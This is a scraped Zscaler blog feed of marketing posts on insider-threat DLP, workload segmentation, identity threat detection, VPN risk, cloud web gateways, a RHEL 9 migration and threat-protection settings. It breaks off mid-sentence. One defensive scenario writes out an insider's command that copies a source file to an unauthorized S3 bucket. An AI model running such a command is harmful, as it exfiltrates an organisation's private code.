Produkte and Lösungen | Blog-Kategorie Zscaler Blog — Neuigkeiten und Einschätzungen vom Branchenführer für Cloudsicherheit. de Betrayal in the Cloud: Unmasking Insider Threats and Halting Data Exfiltration from Public Cloud Workloads Introduction In today’s digital world, safeguarding sensitive data, such as source code, is crucial. Insider threats are a worthy adversary, posing significant risk, especially with trusted employees having access to valuable repositories. This article explores how a fictitious software development company could use Zscaler security solutions to stop insider attempts to upload source code. By using Zscaler Workload Communications, the fictitious company detects and prevents unauthorized uploads, ensuring the security of its intellectual property. Insider Threat in the Cloud and How to Stop Them A fictitious software development company relies on its source code repository as the lifeblood of its operations. Trusted employees have access to this repository to facilitate collaboration and innovation. To mitigate the risk of insider threats, the fictitious company implements Zscaler security solutions. Let’s explore how our products thwart an insider’s attempt to upload source code to an unauthorized destination. Attack Chain Use Case StepsTrusted employee access: A trusted employee (insider) has access to the source code repository, enabling them to complete their job responsibilities. A simplified example of source code is shown below: Insider threat incident: The trusted employee with legitimate access decides to misuse their privileges by attempting to upload source code files to an unauthorized destination—an AWS S3 bucket, with the intention of unauthorized sharing. or user:~$ aws s3 cp sourcecode.c s3://bucket/uploads/sourcecode.c Figure 1: This diagram depicts how Zscaler blocks insider threats Integration with Zscaler Workload Communications: The fictitious company’s source code repository is configured to route all outbound traffic through Zscaler Workload Communications, ensuring that data transmissions undergo rigorous inspection and security policies are enforced. ZIA DLP engine implementation: ZIA leverages its powerful inline data loss protection (DLP) engine to analyze data traffic in real time. ZIA’s DLP policies are designed to identify and and prevent unauthorized attempts to upload source code files to external storage spaces. An example of DLP configuration options is shown below. Figure 2: An example of DLP configuration options. Detection and prevention of file upload attempts: As an insider attempts to upload source code files to the unauthorized AWS S3 bucket, ZIA’s DLP engine detects it as a violation of security policies. Leveraging advanced pattern recognition and behavior analysis, ZIA blocks the upload attempt in real time, preventing the exfiltration of company data. The figure below shows the source code file upload attempt failing in real time. Figure 2: The source code file upload command receives an error when executed The upload attempt, which was in violation of company policy, appears in descriptive log records, as shown below. Figure 3: A log showing the failed source code file upload, along with important details like user, location, and destination Alerting and response: The Zscaler security platform generates immediate alerts upon detecting the unauthorized upload attempt. How Zscaler Can HelpZscaler’s security products offer effective solutions against insider threats aimed at source code repositories: Outbound Data Violation TriggerBy routing through Zscaler’s Cloud Connector, organizations can enforce security policies on all outbound data transmissions, including those from source code repositories. This integration ensures that every upload attempt undergoes through security checks, regardless of the destination. Data Breach PreventionZscaler Internet Access (ZIA) features a powerful data loss prevention (DLP) engine that analyzes data in real time. Leveraging advanced DLP policies, ZIA can detect patterns indicative of unauthorized source code uploads. This approach enables organizations to prevent data breaches before they occur. Instant Alerts The Zscaler platform provides real-time monitoring of all network activity, including access to source code repositories. Any suspicious behavior, such as attempts to upload source code to unauthorized destinations, triggers immediate alerts. This allows security teams to respond promptly and prevent potential data exfiltration. ConclusionWith cybersecurity threats on the rise, organizations must combat insider risks effectively. Zscaler solutions offer proactive measures against insider threats, as demonstrated by the hypothetical use case outlined above. By implementing robust DLP policies and real-time monitoring, organizations can protect their critical data unauthorized access and maintain data integrity. The Zscaler platform equips organizations to tackle insider threats confidently, securing their digital assets effectively. Tue, 02 Apr 2024 13:31:17 -0700 Sakthi Chandra Exposing the Dark Side of Public Clouds - Combating Malicious Attacks on Workloads IntroductionThis article compares the cybersecurity strategies of a company that does not use Zscaler solutions with one that has implemented Zscaler's offerings. By exploring two different scenarios, we will highlight the advantages of Zscaler zero trust for workload communications and its specific use of data loss prevention. Threat Propagation Without Zscaler IntegrationLateral Movement Between WorkloadsIn the following scenario, you’ll see that without Zscaler’s integration, the organization is unable to detect or prevent threats effectively. This allows attackers to move laterally and exfiltrate data undetected, leading to significant security risks. Workload 1 in Azure West sends an HTTP GET request to GitHub for a patch update: Workload 1, deployed in Azure West, initiates an outbound connection to GitHub to fetch a required patch update. This HTTP GET request is sent to Github to download the patch: An HTTP response containing malware from GitHub: Unbeknownst to the organization, the HTTP response received from GitHub contains embedded malware. Attacker’s lateral movement to Workload 2: By exploiting the malware present in the HTTP response, an attacker gains access to Workload 1 and subsequently moves laterally to Workload 2 within the Azure West environment. From here, the attacker exploits vulnerabilities or misconfigurations in Workload 2 to achieve a network foothold and establish persistence in Workload 2 that further their malicious objectives. Data Exfiltration to a command-and-control (C2) server: With access to Workload 2, the attacker exfiltrates sensitive data from the organization’s environment to a remote C2 server. Threat Containment with Zscaler IntegrationIn the following scenario, Zscaler’s integrated security platform provides comprehensive protection against various stages of the attack life cycle. Organizations can use Zscaler Internet Access (ZIA), coupled with Zscaler Data Loss Prevention (DLP) and Zscaler Workload Communications to implement: Strict access controls Malware detection and prevention measures Workload segmentation Enhanced outbound security measures to GitHub (internet): With Zscaler integrated into the organization’s infrastructure, outbound traffic from Workload 1 to GitHub is subjected to stringent access control policies. Only approved URIs are permitted, which ensures communications are limited to trusted destinations. Any attempt to access unauthorized URIs is blocked. Malware detection and prevention: Zscaler’s security layers, including content inspection and advanced cloud sandbox features, intercept and inspect the HTTP response from GitHub in real time. Upon detecting malware, Zscaler halts transmission, preventing Workload 1 from being compromised. Workload segmentation to prevent lateral movement: Zscaler enforces strict segmentation policies ensuring that Workload 1 and Workload 2, which are deployed across two different regions, are treated as private applications with no direct communication allowed between them. Such segmentation effectively isolates these workloads, preventing any lateral threat movement between them. Egress traffic security from Workload 2 with advanced data protection: Egress traffic from Workload 2 is safeguarded using ZIA advanced protection capabilities. Zscaler ensures that sensitive data is not exfiltrated from the organization's environment. By enforcing DLP policies, Zscaler prevents unauthorized data transfers. ConclusionThe deployment of Zscaler’s solutions significantly enhanced the organization’s ability to combat cyberthreats and safeguard public cloud workloads. Without Zscaler, companies face unmonitored outbound traffic, susceptibility to malware infiltration, and the risk of lateral movement and data exfiltration. With Zscaler zero trust for workloads, organizations enjoy comprehensive protection, including access control policies, malware detection and prevention, segmentation to prevent lateral movement, and advanced data protection measures. Implementing Zscaler solutions enables organizations to bolster their cybersecurity defenses, mitigate risks, and protect their intellectual property from evolving threats in an interconnected digital environment. Tue, 02 Apr 2024 19:14:07 -0700 Sakthi Chandra Protecting Identity Becomes Pivotal in Stopping Cyberattacks As today’s workplace transforms, data is no longer centralised and is spread across cloud, increasing the attack surface. Attackers are constantly looking for vulnerabilities to exploit and searching for the Achilles heel in identity systems that could deliver them entry into your IT environment. Cyber actors are now using sophisticated methods to target Identity and access management infrastructure. Credential misuse is the most common attack method. According to Gartner, “Modern attacks have shown that identity hygiene is not enough to prevent breaches. Multifactor authentication and entitlement management can be circumvented, and they lack mechanisms for detection and response if something goes wrong.” Prioritize securing identity infrastructure with tools to monitor identity attack techniques, protect identity and access controls, detect when attacks are occurring, and enable fast remediation. Zscaler ITDR detects credential theft and privilege misuse, attacks on Active Directory, and risky entitlements that create attack paths With identity-based attacks on the rise, today’s businesses require the ability to detect when attackers exploit, misuse, or steal enterprise identities. Identifying and detecting identity-based threats is now crucial due to attackers' propensity of using credentials and Active Directory (AD) exploitation techniques for privilege escalations and for lateral movement across your environment. Zscaler ITDR helps you to thwart identity-based AD attacks in real-time and help you to gain actionable insight into gaps in your identity attack surface. The solution enables you to continuously monitor identities, provides visibility on misconfigurations/ risky permissions and detect identity-based attacks such as credential theft, multifactor authentication bypass, and privilege escalation. Gain Full Visibility Uncover blind spots and understand hidden vulnerabilities that leave your environment susceptible to identity-based attacks such as exposed surfaces, dormant credentials, and policy violations. Real-Time Identity Threat Detection and Response Zscaler Identity Protection uses identity threat detections and decoys that rise high fidelity alerts to help your security teams to swiftly remediate with targeted response. The same endpoint agent that runs deception also detects identity attacks on the endpoint. These include advanced attacks like DCSync, DCShadow, LDAP enumeration, session enumeration, Kerberoast attacks, and more. Reduce Identity Risk With deep visibility on identity context, Zscaler Identity Protection helps your security teams to identify, address, and purge compromised systems and exposed credentials quickly. Often, security teams struggle to collect context and correlations to investigate threats. Zscaler ITDR solves this problem by consolidating all risk signals, threats detected, failed posture checks , Okta metadata, and policy blocks (ZIA/ZPA) into a single view for each identity. You can now quickly investigate risky identities for indicators of compromise and potential exploitation. Prevent Credential Misuse/Theft Attackers use stolen credentials and attack Active Directory to escalate privileges to move laterally. Zscaler Identity Protection helps to detect credential exploits and prevent credential theft or misuse. Spot Lateral Movement Stop attackers who have gotten past perimeter-based defenses and are attempting to move laterally through your environment. Zscaler Deception ITDR enhances security by identifying misconfigurations and credential exposures that create attack paths for attackers to use for lateral movement. Zscaler ITDR: Beyond just prevention – Monitor, detect, & respond to identity threats Monitor: Identity systems are in constant flux with configuration and permissions changes. Get alerts when configuration changes introduce new risks. Organizations lack visibility into credential sprawl across their endpoint footprint, leaving them vulnerable to attackers who exploit these credentials to access sensitive data and apps. The solution is Zscaler ITDR, which audits all endpoints to identify credentials and other sensitive material in various sources such as files, registry, memory, cache, configuration files, credential managers, and browsers and gains visibility into endpoint credential exposure to identify lateral movement paths, enforcing policies, and cleaning up credentials to reduce the internal attack surface. Detect: ITDR automatically surfaces hidden risks that might otherwise slip through the cracks. Zscaler ITDR pulls together all risk signals, threats detected, posture checks failed, metadata from Okta, and policy blocks from ZIA/ZPA into a single unified view to provide a complete picture of risk for an identity. This helps to identify & detect unmanaged identities, misconfigured settings, and even credential misuse. Respond: ITDR spots attacks targeting your identity store, you can take immediate action. Restrict or terminate those identities causing trouble and shut down threats before they have a chance to wreak havoc. Zscaler ITDR Benefits Minimize the Attack Surface Reduce attack surface by gaining continuous visibility into the attack vectors and identity misconfigurations. Identify to stop adversarial advances—including ransomware attacks—in their tracks with traps set. Real-Time Identity Threat Detection Thwart sophisticated attacks on Active Directory using identity threat detections on endpoints. Accelerate Incident Response Built-in threat detection and response speeds up threat detections and expands coverage to significantly reduce mean time to response (MTTR). ITDR helps security teams drive down their mean time to respond and prioritize what matters most by risk scoring. Conclusion No matter what – Breaches are inevitable, and preventative security measures aren’t sufficient to thwart them. Though staying upbeat while fighting cyberthreats, shrinking budgets, and staff turnover is a tall task, how we respond today dictates how we perform tomorrow. Choosing and adopting identity protection solutions like ITDR helps your company evolve its zero trust security and compliance posture in response to the changing threat landscape. Zscaler ITDR strengthens your zero trust posture by mitigating the risks of user compromise and privilege exploitation. Fri, 22 März 2024 02:39:16 -0700 Nagesh Swamy Eliminate Risky Attack Surfaces Many moons ago, when the world wide web was young and the nerd in me was strong, I remember building a PC and setting it up as a web server. In those exciting, pioneering days, it was quite something to be able to have my very own IP address on the internet and serve my own web pages directly from my Apache server to the world. Great fun. I also remember looking at the server logs in horror as I scrolled through pages upon pages of failed login, and presumably hacking, attempts. I’d buttoned things up pretty nicely from a security standpoint, but even so, it would only have taken a vulnerability in an unpatched piece of software for a breach to occur, and from there, all bets would have been off. Even today, many internet service providers will let you provision your own server, should you feel brave enough. Of course, the stakes were not high for me at home, but knowing what we know now about the growth of ransomware attacks and how AI is facilitating them, no organization would dare do such a thing in 2024. Back then, I’d created an obvious and open attack surface. Tools were (and still are) readily available to scan IP address ranges on any network and identify open ports. In my case, ports 22, 80 and 443 were open to serve web pages and enable me to administer my server remotely. Every open port is a potential conduit into the heart of the hosting device, and so these should be eliminated where possible. Open ports, VPNs, and business Since online remote working became a real possibility in the early 2000s, organizations have tried to protect themselves and their employees by adopting VPN technology to encrypt traffic between a remote device and a VPN concentrator at the head office, allowing employees access to services like email, file and print servers. Even when these services became cloud-based solutions like Gmail and DropBox, many organizations pulled that traffic across a VPN to apply IT access policies. Not only did this often lead to an inefficient path from a remote worker to their applications, it also presented a serious security risk. As the performance and dependability of the internet grew, we also saw the advent of site-to-site VPNs, which made for an attractive alternative to far more expensive circuit-based connections that had been so prevalent such as MPLS. A vast number of organizations continue to rely on a virtual wide area network (WAN) built on top of VPNs. Unfortunately, as the old saying goes, there’s no such thing as a free lunch. Every VPN client or site using the internet as its backbone needs an IP address to connect to, an open port to connect through, and, well, you can see where this is going. Not every VPN solution has an active flaw, just as—luckily—my Apache server didn’t at the time I was running it. That said, software is fallible, and history has demonstrated this fact in numerous instances in which vulnerabilities are discovered and exploited in VPN products. Just last month, a fatal flaw was discovered in Ivanti’s VPN services, leaving thousands of users and organizations open to attack. Hackers are scouring day and night for vulnerabilities like these to exploit—and AI is only making their lives easier. “without proper configuration, patch management, and hardening, VPNs are vulnerable to attack” from Securing IPsec Virtual Private Networks by the National Security Agency (NSA) Zscaler is different The Zscaler Zero Trust Exchange™ works in a fundamentally different way—no VPN is required to securely connect. Instead, connections via the internet (or even from within a managed network) are policed on multiple levels. An agent on your device creates a TLS tunnel to the Zscaler cloud, which accepts connections only from known tenants (or Zscaler customers). This tunnel is mutually authenticated and encrypted between the agent and the Zscaler cloud. The individual and their device(s) must additionally be identified as part of the process. In short, it’s not possible to simply make a TLS connection to Zscaler. Once an approved user from a known customer with a recognized device connects to Zscaler, they’re still prevented from moving laterally over the network, as is the case with VPNs. With Zscaler, there is no IP range to which the user has access. Instead, every connection attempt has to be authorized, following the principles of zero trust. A user has access only to the applications for which they’ve been authorized. With this framework, even if an organization were to be successfully attacked, the blast radius would be limited. The same cannot be said for network-based security. Here’s the bottom line: VPNs and the firewalls behind them served us well for a long time, but the challenges that come with maintaining a security posture built on these legacy technologies are so great that it’s now a material business risk to use them. You need only to turn the news on for a few minutes to be reminded of this. Networks were built fundamentally to enable connectivity, and adding security to these networks is an uphill battle of putting the right obstacles in the way of that connectivity. This is why more and more public bodies and private organizations are turning this idea on its head and embracing a zero trust architecture that provides access for only an approved entity, on an approved device, to the applications to which they are entitled. At Zscaler we have built tools to help you assess the potential risk your own organization faces, some of which are free to access. Test your own defenses by visiting and when you’re ready to learn more, get in touch! Tue, 02 Apr 2024 01:00:01 -0700 Simon Tompson Break Free from Appliance-Based Secure Web Gateway (SWG) The way we work today is vastly different from a few years ago. McKinsey & Company’s State of Organization 2023 report identified that before the COVID-19 pandemic, most organizations expected employees to spend more than 80% of their time in-office. But as of 2023, says the report, 90% of employees have embraced hybrid models, allowing them to work from home or other locations some (if not most) of the time. On a similar note, applications previously hosted in on-premises data centers are increasingly moving to the cloud. Gartner predicted that SaaS application spending would grow 17.9% to total $197 billion in 2023. With employees and apps both migrating off-premises, security controls logically must do the same. It’s no exaggeration to state that cloud and mobility have broken the legacy way of approaching security—so why should the castle-and-moat security approach, heavily reliant on hardware such as appliance-based proxies/SWGs, still exist? Users need fast, reliable, secure connectivity to the internet and cloud apps, with the flexibility to connect and work from anywhere. However, traditional SWGs have certain limitations, leading to security challenges, poor user experience, constant maintenance, and scalability issues. Let’s take a look at why it’s time to break free from appliance-based SWG. Security challengesIn December 2013, the Google Transparency Report showed just 48% of World Wide Web traffic was encrypted. Today, the same report shows at least 95% of traffic is encrypted. So, it’s no surprise that the Zscaler ThreatLabz 2023 State of Encrypted Attacks report showed 85.9% of threats—malware payloads, phishing scams, ad spyware sites, sensitive data leaks, and more—are now delivered over encrypted channels. While most organizations have some form of protection against malware, attackers are evolving their techniques, creating new variants able to bypass reputation-based detection technologies. As threat actors increasingly rely on encrypted channels, it’s more crucial than ever to inspect 100% of TLS/SSL traffic. This is the biggest way appliance-based proxies weigh down organizations: most SWG appliances lack the capacity to perform 100% inspection. Our 2023 State of Encrypted Attacks report surveyed 284 IT, security, and networking professionals and found that they mainly use legacy tools like web application firewalls and network-layer firewalls to scan traffic. However, respondents agreed that complexity, cost, and performance degradation are the biggest barriers to inspecting all TLS/SSL traffic. Furthermore, certain regulations require different policies for distinct data types, making inspection an arduous task. Poor user experienceCompared to only a few years ago, the meaning of “fast” is very different for today’s internet users. Instant access and connectivity has become the norm at home. Employees juxtapose the great digital experience in their personal lives with poor connectivity and performance issues that plague their digital work lives. Appliance-based SWGs are among the main culprits of poor user experience because they can’t scale quickly to handle traffic surges, and they require traffic to be backhauled to a central data center, leading to high latency and lost productivity for users trying to access the internet or SaaS applications. And all this inevitably affects revenue. Maintenance and scalability issuesApart from complexity and tedious management, other challenges of appliance-based SWGs are maintenance and scalability issues. To account for traffic surges and future growth, security teams are forced to overprovision, leading to expensive appliances sitting unused. At other times, they may need to wait multiple months for appliances/upgrades to arrive. With appliance-based SWG, security teams are always spread too thin, having to constantly update SWGs to account for changes to the organization and/or the threat landscape. The Zscaler differenceOvercome the limitations of appliance-based SWG with Zscaler. Better security: Inspect 100% of TLS/SSL traffic to find and stop threats—86% of which are delivered over encrypted channels. Better user experience: Stop backhauling internet/SaaS traffic with AI-powered Zscaler SWG, delivered from 150+ points of presence worldwide–close to your users and their cloud destinations for lower latency. No hardware to maintain: Move to a cloud native proxy architecture and eliminate the hardware headaches of maintenance, updates, patches, and upgrades. Platform approach: Extend comprehensive security functions, such as cloud firewall, sandbox, CASB, and data loss prevention, as well as end-to-end experience monitoring from a single unified platform and agent. If you’d like to know more about the reasons to break free from appliance-based proxies, check out this on-demand webinar. Wed, 20 März 2024 07:04:23 -0700 Apoorva Ravikrishnan Zscaler Selects Red Hat Enterprise Linux 9 (RHEL 9) as Next-Gen Private Access Operating System What’s new?On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private AccessTM (ZPA). RHEL 9 is the modern enterprise equivalent to CentOS 7, backed by Red Hat, and supported through 2032. This continues ZPA’s proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What’s more, this transition can be done with no impact to operations or user access. When will it be released?Pre-built images for all ZPA-supported platforms are targeted for release in May 2024. All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately on release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native Red Hat Package Manager (RPM) and repositories. New Enterprise OS Without Licensing FeesTo ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers. We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won’t conflict with any existing Red Hat enterprise license agreements you may hold. CentOS 7 End of LifeThe CentOS Project and Red Hat will be ending the final extended support for CentOS 7 and RHEL 7 on June 30, 2024. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting all enterprise data centers, and operations and will take time to transition over to new operating systems and software. In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date. See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL and the ZPA white paper for architecture and security design. While we have ample controls in place and the utmost confidence, there is always inherent risk in using an unsupported server operating system. Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and supporting security libraries. Lightweight and Container Orchestration ReadyFollowing Zscaler’s cloud-native and best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connector and Private Service Edge the benefit of being scaled and migrated without worry for previously deployed instances or operating system upgrade paths. For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components. In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images as well as the public cloud marketplaces are fully ready for autoscale groups, supporting quick scale up and scale down. Migration and Support ExcellenceZscaler understands your concerns and will fully support you throughout this transition process. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase of App Connector or PSE limits are needed in your environment to complete migration, there will be no extra licensing costs. Below are the steps to help you replace CentOS 7 instances with RHEL 9. The enrollment and provisioning of new App Connectors and Private Service Edges can be automated in a few steps using Terraform (infrastructure-as-code) or Container Orchestration to simplify deployment further. App Connector Migration Steps:Create new App Connector Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 App Connectors to the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.) Update the App Connector group's version profile to "default - el9" so that it's able to receive the proper binary updates (This version profile can be set as default for the tenant once all connectors are moved to RHEL 9) Deploy new VMs using the upcoming RHEL 9 OVAs and newly created provisioning keys (templates can be used) Add the new App Connector Groups to each respective Server Group (Optional) In the UI, disable the app connector groups five minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down During regional off-hours, remove the CentOS 7 App Connector Groups Private Service Edge Migration Steps:Create new Service Edge Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 PSEs to the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.) Update the Service Edge Group's version profile to "Default - el9" so that it's able to receive the proper binary updates (This version profile can be set as default for the tenant once all connectors and PSEs are moved to RHEL 9) Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used) Add trusted networks and enable “publicly accessible” (if applicable) on the new Service Edge Groups (Optional) In the UI, disable the Service Edge Groups 15 minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down During regional off hours, remove trusted networks and disable public access (if applicable) on CentOS 7 Service Edge Groups Please reach out to your respective support representatives for further assistance and information as needed. For more information: Zscaler Private Access Website Zscaler Private Access | Zero Trust Network Access (ZTNA) End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x ZPA App Connector Software by Platform ZPA Private Service Edge Software by Platform Mon, 18 März 2024 15:34:32 -0700 Shefali Chinni Outpace Attackers with AI-Powered Advanced Threat Protection Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start. Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more. Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization. In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention. With ATP you can: Allow, block, isolate, or alert on web pages based on AI-determined risk scores Block malicious content, files, botnet, and C2 traffic Stop phishing, spyware, cryptomining, adware, and webspam Prevent data loss via IRC or SSH tunneling and C2 traffic Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads To provide this protection, Zscaler inspects traffic—encrypted or unencrypted—to block attackers’ attempts to compromise your organization. Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic. Enabling protection against these threats takes just a few minutes in ATP in the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend you select “Block” for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console. Prevent web content from compromising your environmentThreat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts. To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser. Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns. Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of the contextual data of a domain, including hosting country, domain age, and links to high-risk top-level domains. The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale. This risk score is then evaluated against the Page Risk value you set in the ATP configuration setting (as shown below). Zscaler will block users from accessing all web pages with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance. Disrupt automated botnet communicationA botnet is a group of internet-connected devices, each of which runs one or more bots, or small programs, that are collectively used for service disruption, financial or sensitive information theft via distributed denial-of-service (DDoS) attacks, spam campaigns, or brute-forcing systems. The threat actor controls the botnet using command-and-control software. Command & Control Servers An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices. Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices. Command & Control Traffic This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic. Block malicious downloads and browser exploits Malicious Content & Sites Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content could include exploit kits, compromised websites, and malicious advertising. Vulnerable ActiveX Controls An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment. Browser Exploits Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations. Foil digital fraud and cryptomining attempts AI-Powered Phishing Detection Phishing is becoming harder to stop with new tactics, including phishing kits sold on the black market—these kits enable attackers to spin up phishing campaigns and malicious web pages that can be updated in a matter of hours. Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts. Phishing attacks remain problematic because even unsophisticated criminals can simply buy kits on the dark web. Threat actors can also update phishing pages more quickly than most security solutions meant to detect and prevent phishing can keep up with. But with Zscaler ATP, you can prevent compromises from patient zero phishing pages inline with advanced AI-based detection. Known Phishing Sites Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites. Suspected Phishing Sites Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind—that gap can only be addressed by a capability able to stop both new and unknown phishing attacks. Spyware Callback Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals. When “Spyware Callback” blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information. Cryptomining Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency—but this malware also consumes resources and impacts performance of infected machines. Enabling “Block” in ATP’s configuration settings prevents cryptomining entering your environment via user devices. Known Adware & Spyware Sites Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUA). These web requests can be denied based on the reputation of the destination IP or domain name. Choose “Block” in ATP policy configuration to prevent your users from accessing known adware and spyware sites. Shut down unauthorized communication Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites. IRC Tunneling Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or “channels”), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Hackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option will block IRC traffic from being tunneled over HTTP/S. SSH Tunneling SSH tunneling enables sending data with an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity. Anonymizers Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites. Block cross-site scripting (XSS) and other malicious web requestsCross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user. Cookie Stealing Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data including valuable personal and financial details they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts. Potentially Malicious Requests Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially. Prevent compromise via peer-to-peer file sharing P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content—and the same content files can contain malware embedded within legitimate data or programs. BitTorrent The Zscaler service can block the usage of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, global torrent traffic has decreased from a high of 35% in the mid-2000s to just 3% of all global internet traffic in 2022. Tor Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block the usage of the Tor protocol. Avoid VOIP bandwidth overutilizationWhile convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance level and overall network performance, you may want to curtail employee or contractor use of Google Hangouts. Google Hangouts While VOIP application usage may be encouraged for cost savings over traditional landline-based communications, it’s often associated with high bandwidth usage. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to meet a 3.2 Mbps outbound bandwidth threshold. Inbound bandwidth required starts at 2.6Mbps for two users and expands with additional participants. In Zscaler ATP, you can block Google Hangout usage to conserve bandwidth for other business-critical applications. Comprehensive, always-on, real-time protection Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud—all at 